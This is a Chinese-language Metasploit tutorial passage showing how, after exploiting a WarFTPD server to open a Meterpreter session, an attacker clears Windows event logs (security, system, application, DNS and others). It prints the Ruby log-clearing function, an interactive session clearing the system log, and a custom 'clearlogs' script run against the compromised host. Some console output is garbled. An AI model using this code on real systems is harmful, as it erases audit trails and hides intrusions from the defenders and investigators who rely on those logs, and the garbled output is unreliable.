有时最好不要记录您的活动。无论出于何种原因,您都可能会发现需要清除Windows事件日志的情况。查看位于scripts / meterpreter中的winenum脚本的源代码,我们可以看到此函数的工作方式。
def clrevtlgs() evtlogs = [ 'security', 'system', 'application', 'directory service', 'dns server', 'file replication service' ] print_status("Clearing Event Logs, this will leave and event 517") begin evtlogs.each do |evl| print_status("\tClearing the #{evl} Event Log") log = @client.sys.eventlog.open(evl) log.clear file_local_write(@dest,"Cleared the #{evl} Event Log") end print_status("All Event Logs have been cleared") rescue ::Exception => e print_status("Error clearing Event Log: #{e.class} #{e}") end end
现在,让我们利用系统并手动清除日志。我们将根据winenum脚本对命令进行建模。运行log = client.sys.eventlog.open(’system’)将为我们打开系统日志。
msf exploit(warftpd_165_user) > exploit [*] Handler binding to LHOST [*] Started reverse handler [*] Connecting to FTP server [*] Connected to target FTP server. [*] Trying target Windows 2000 SP0-SP4 English... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 2 opened ( -> meterpreter > irb [*] Starting IRB shell [*] The 'client' variable holds the meterpreter client >> log = client.sys.eventlog.open('system') => #>#:0xb6779424 @client=#>, #>, # "windows/browser/facebook_extractiptc"=>#, "windows/antivirus/trendmicro_serverprotect_earthagent"=>#, "windows/browser/ie_iscomponentinstalled"=>#, "windows/exec/reverse_ord_tcp"=>#, "windows/http/apache_chunked"=>#, "windows/imap/novell_netmail_append"=>#
>> log.clear => #>#:0xb6779424 @client=#>, /trendmicro_serverprotect_earthagent"=>#, "windows/browser/ie_iscomponentinstalled"=>#, "windows/exec/reverse_ord_tcp"=>#, "windows/http/apache_chunked"=>#, "windows/imap/novell_netmail_append"=>#
# Clears Windows Event Logs evtlogs = [ 'security', 'system', 'application', 'directory service', 'dns server', 'file replication service' ] print_line("Clearing Event Logs, this will leave an event 517") evtlogs.each do |evl| print_status("Clearing the #{evl} Event Log") log = client.sys.eventlog.open(evl) log.clear end print_line("All Clear! You are a Ninja!")
编写脚本后,我们将其放在/ usr / share / metasploit-framework / scripts / meterpreter /中。然后,让我们重新利用该系统,看看它是否有效。
msf exploit(warftpd_165_user) > exploit [*] Handler binding to LHOST [*] Started reverse handler [*] Connecting to FTP server [*] Connected to target FTP server. [*] Trying target Windows 2000 SP0-SP4 English... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened ( -> meterpreter > run clearlogs Clearing Event Logs, this will leave an event 517 [*] Clearing the security Event Log [*] Clearing the system Event Log [*] Clearing the application Event Log [*] Clearing the directory service Event Log [*] Clearing the dns server Event Log [*] Clearing the file replication service Event Log All Clear! You are a Ninja! meterpreter > exit